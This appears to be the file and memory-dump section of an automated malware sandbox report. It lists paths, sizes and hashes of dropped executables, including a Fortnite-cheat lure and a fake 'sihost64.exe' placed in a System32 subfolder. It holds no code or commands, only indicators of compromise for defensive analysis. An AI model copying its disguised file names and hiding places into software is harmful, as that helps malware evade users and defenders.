C:\Users\Admin\AppData\Local\Temp\cm2.exe

Filesize
2.1MB

MD5
a954a23215467586a71022e732b23a8d

SHA1
c089a6662e8f7bac5ec791b80ec81b77e20bdff4

SHA256
007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751

SHA512
e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2b3b759e966808098067552e23bdcd85

SHA1
4512bc212d585bd8bdabd097b9c6c3e2cb1c18fc

SHA256
566f153af491adc56c2f55aca4d733ff07485f027a1827e2cf2a2c10d0b29fb8

SHA512
c683e3d81db93e946aeb27048ec8a618336ae679d19c5c7d144ef5de0fcecbc33af29156233739f42c9162a992a912a84fa6100d8cd624630aff48489cc4b1dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5c482ddbf0a56e908f9790e357b094ce

SHA1
3c62b1bfc7bbef54d96052807e579f5ac9f0c7b8

SHA256
057112dbbd514da8aba8e33721d6cd27ad0e2d5ba15a0970b20961cb0db1423f

SHA512
fe11b5ef292fb1a3566501a1ce9b5e146dde0b7f3efa9918a2cc7f807fa496778c14ab4dc560b0e5a60f812565436287c06065349e6946a67061f1ca017a6d35

Download Submit
C:\Windows\System32\FortniteExternal.exe

Filesize
3.1MB

MD5
52025b6114feff994df431c8a0a5c9ae

SHA1
4b0e9178616c83f68f45775eaacace6027dd42c2

SHA256
8c5c09639035ecd95ba08dd6aae713443b3f45614e1fde653b2d6f45156b4e7b

SHA512
03ee1109f2d0e79620f7f9fee61411762842cc77ccbc1bc25e98c97278e4ee7745d5e3d46d165761ba5134e228e45c270b1d05cdbda6fef51a3409b8e9cdb73f

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
32KB

MD5
76dd3f5cec238575932dfbe21ff77b71

SHA1
100b90b4c2880405683177513f5ef170257af160

SHA256
1e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348

SHA512
0c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
memory/620-48-0x00000000009F0000-0x0000000000D14000-memory.dmp

Filesize
3.1MB

Download
memory/1480-91-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-109-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-121-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-112-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-89-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-93-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-97-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-87-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-95-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-103-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-120-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-119-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-118-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-117-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-105-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-116-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-111-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/1480-113-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-114-0x00000000000F0000-0x0000000000110000-memory.dmp

Filesize
128KB

Download
memory/1480-99-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-107-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1480-101-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1600-57-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/1600-56-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/1776-940-0x000007FEEB350000-0x000007FEEB9B5000-memory.dmp

Filesize
6.4MB

Download
memory/1824-63-0x0000000000220000-0x0000000000544000-memory.dmp

Filesize
3.1MB

Download
memory/2728-148-0x0000000000250000-0x0000000000256000-memory.dmp

Filesize
24KB

Download
memory/2728-147-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/2760-66-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-65-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

Filesize
4KB

Download
memory/2760-35-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-32-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-33-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-26-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2760-25-0x000000001B840000-0x000000001BA60000-memory.dmp

Filesize
2.1MB

Download
memory/2760-24-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

Filesize
4KB

Download
memory/2760-23-0x00000000001D0000-0x00000000003F1000-memory.dmp

Filesize
2.1MB

Download
memory/2760-73-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

Filesize
9.9MB

Download
memory/2896-50-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2896-49-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download